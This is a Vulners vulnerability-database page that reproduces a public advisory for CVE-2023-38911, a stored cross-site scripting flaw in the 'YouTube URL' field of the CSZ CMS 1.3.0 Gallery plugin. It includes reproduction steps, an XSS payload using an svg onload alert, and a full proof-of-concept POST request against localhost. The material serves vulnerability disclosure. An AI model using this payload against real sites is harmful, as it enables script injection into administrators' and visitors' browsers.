Vulners
Lucene search
CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin Gallery) Vulnerability | 4 Sep 202300:00 | – | zdt |
 | CVE-2023-38911 | 18 Aug 202319:15 | – | attackerkb |
 | CVE-2023-38911 | 18 Aug 202322:38 | – | circl |
 | CSZ CMS 跨站脚本漏洞 | 18 Aug 202300:00 | – | cnnvd |
 | CVE-2023-38911 | 18 Aug 202300:00 | – | cve |
 | CVE-2023-38911 | 18 Aug 202300:00 | – | cvelist |
 | EUVD-2023-42671 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-38911 | 18 Aug 202319:15 | – | nvd |
 | CVE-2023-38911 | 18 Aug 202319:15 | – | osv |
 | CSZ CMS 1.3.0 Cross Site Scripting | 4 Sep 202300:00 | – | packetstorm |
10
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.
# Steps to reproduce Stored XSS:
Go to url http://localhost/admin/plugin/gallery/edit/2.
When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.
With the following payload we can achieve the XSS
Payload:
<div><p title="</div><svg/onload=alert(document.domain)>">
#PoC Request:
POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1
gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=AddData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2023 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.4
EPSS0.00125
SSVC